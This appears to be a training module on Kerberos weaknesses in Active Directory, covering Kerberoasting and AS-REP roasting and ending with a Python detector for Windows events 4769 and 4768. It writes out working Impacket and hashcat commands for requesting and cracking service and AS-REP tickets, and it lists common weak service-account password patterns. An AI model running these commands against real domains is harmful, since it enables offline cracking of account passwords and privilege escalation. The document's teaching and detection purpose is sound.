Kerberos is 35+ years old. It was designed at MIT in 1988 for a specific threat model: one network, trusted users, and malicious insiders as a rare exception. Active Directory bolted Kerberos onto Windows networks starting in 2000, and the threat model was never updated. Today every Active Directory compromise report mentions Kerberos — Kerberoasting, AS-REP roasting, Golden Tickets, Silver Tickets, constrained delegation abuse, S4U2Self, resource-based constrained delegation. This module is about why Kerberos keeps producing attacks.
Why this happens
Kerberos has design features that made sense in 1988:
- Credentials as symmetric secrets (a key derived from the user’s password is what protects the session key)
- Tickets are data blobs that can be transferred and replayed until they expire
- Timestamps for replay protection (assumes synchronized clocks)
- Cross-realm trust bridges different networks (assumes realms trust each other)
- Delegation (A can act as B) for multi-hop service chains
Each of these features, in a 2026 network with attacker-controlled endpoints, becomes an attack. The attacker extracts tickets from memory. The attacker forges tickets using captured key material. The attacker abuses delegation to impersonate privileged accounts. The protocol works exactly as designed — and the design enables modern attacks.
Kerberoasting
Any authenticated user on the domain can request a service ticket (TGS) for any service principal. The ticket is encrypted with a key derived from the service account’s password (with RC4, etype 23, that key is the account’s NT hash). The attacker takes the ticket offline and cracks the password from it.
# Find users with SPN (Service Principal Name) set
# Service accounts are prime targets — often have weak passwords
GetUserSPNs.py CORP/alice.smith:Password1 -dc-ip 10.1.1.1 -request
# Output:
# [+] sqlsvc SPN: MSSQLSvc/sqlserver.corp.local:1433
# [+] websvc SPN: HTTP/webserver.corp.local
# [*] TGS for sqlsvc : $krb5tgs$23$*sqlsvc$CORP.LOCAL$MSSQLSvc/...$...
# Crack offline
hashcat -m 13100 tgs_hashes.txt rockyou.txt
# Service accounts often have never-changing passwords set when service deployed
# Common weak patterns: "<servicename>" + year, "Autumn2022!", words related to the service
# Successful crack → service account creds → often admin on the application server
Why this works in 2026: service accounts are often exempted from password rotation policies because rotating breaks services. They often have elevated privileges on specific servers. Cracking one can jump the attacker from “domain user” to “admin on critical application.”
AS-REP Roasting
Accounts with “Do not require Kerberos pre-authentication” set can have their AS-REP (authentication response) requested by anyone who can reach the KDC, without knowing the account’s password. The encrypted part of the AS-REP is protected with a key derived from the user’s password — crackable offline.
# Find vulnerable accounts
GetNPUsers.py CORP/ -dc-ip 10.1.1.1 -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
# Crack
hashcat -m 18200 asrep_hashes.txt rockyou.txt
# Legacy accounts (old automation, old applications) often have this flag
# Attacker doesn't need any credential to request AS-REPs
The feature was added for compatibility with systems that predate Kerberos pre-authentication (Unix Kerberos implementations from the 1990s). It is almost never needed in 2026, and it almost always leaves vulnerable accounts behind.
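Both attacks above leave a trace at the domain controller: Kerberoasting appears as event 4769 service-ticket requests with RC4 (etype 0x17, the $krb5tgs$23$ hashes shown earlier) for user-account SPNs, and AS-REP roasting as event 4768 with pre-authentication type 0. The detector below is an added example, not part of this module; it runs over constructed events whose field names mirror the Windows Security event XML (TicketEncryptionType, PreAuthType), and the window and count thresholds are assumptions.

```python
# Added example, not from the module: flag Kerberoasting and AS-REP roasting
# indicators in Windows Security events 4769 (service ticket) and 4768 (TGT).
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # etype 23: the "$krb5tgs$23$" / hashcat 13100 and 18200 case above
NO_PREAUTH = 0    # 4768 PreAuthType 0: logon without pre-authentication

# Constructed sample events (not real telemetry); times are UTC ISO-8601.
EVENTS = [
    {"id": 4769, "time": "2026-03-01T09:00:01", "user": "alice.smith",
     "ip": "10.1.5.20", "service": "sqlsvc", "etype": RC4_HMAC},
    {"id": 4769, "time": "2026-03-01T09:00:02", "user": "alice.smith",
     "ip": "10.1.5.20", "service": "websvc", "etype": RC4_HMAC},
    {"id": 4769, "time": "2026-03-01T09:00:02", "user": "alice.smith",
     "ip": "10.1.5.20", "service": "backupsvc", "etype": RC4_HMAC},
    {"id": 4769, "time": "2026-03-01T09:10:00", "user": "bob.jones",   # AES256 ticket to a
     "ip": "10.1.5.31", "service": "WS042$", "etype": 0x12},           # computer account: normal
    {"id": 4768, "time": "2026-03-01T09:15:00", "user": "legacy.batch",
     "ip": "10.1.5.20", "service": "krbtgt", "etype": RC4_HMAC, "preauth": NO_PREAUTH},
    {"id": 4768, "time": "2026-03-01T09:16:00", "user": "bob.jones",   # PA-ENC-TIMESTAMP
     "ip": "10.1.5.31", "service": "krbtgt", "etype": 0x12, "preauth": 2},
]

def detect(events, window=timedelta(minutes=5), min_services=3):
    """Return (rule, requester_ip, user, detail) findings; thresholds are assumptions."""
    findings = []
    rc4_tgs = defaultdict(list)  # (ip, user) -> [(time, service)] for RC4 user-SPN tickets
    for e in events:
        t, svc = datetime.fromisoformat(e["time"]), e["service"]
        if e["id"] == 4769 and e["etype"] == RC4_HMAC and not svc.endswith("$") and svc != "krbtgt":
            # RC4 service ticket for a user account's SPN: the offline-crackable case
            rc4_tgs[(e["ip"], e["user"])].append((t, svc))
        elif e["id"] == 4768 and e.get("preauth") == NO_PREAUTH:
            findings.append(("asrep_roastable_account", e["ip"], e["user"],
                             "TGT issued without pre-authentication, etype %#x" % e["etype"]))
    for (ip, user), reqs in rc4_tgs.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # sliding window over that requester's tickets
            svcs = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(svcs) >= min_services:
                findings.append(("kerberoasting_burst", ip, user, "%d distinct RC4 SPN tickets in %s: %s"
                                 % (len(svcs), window, ", ".join(sorted(svcs)))))
                break
    return findings

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(*f)
```

A single RC4 ticket to a user-account SPN is not flagged on its own, since legacy services still legitimately negotiate RC4; the burst rule is what separates enumeration from normal use, and the AS-REP rule points at accounts whose pre-authentication flag should be reviewed.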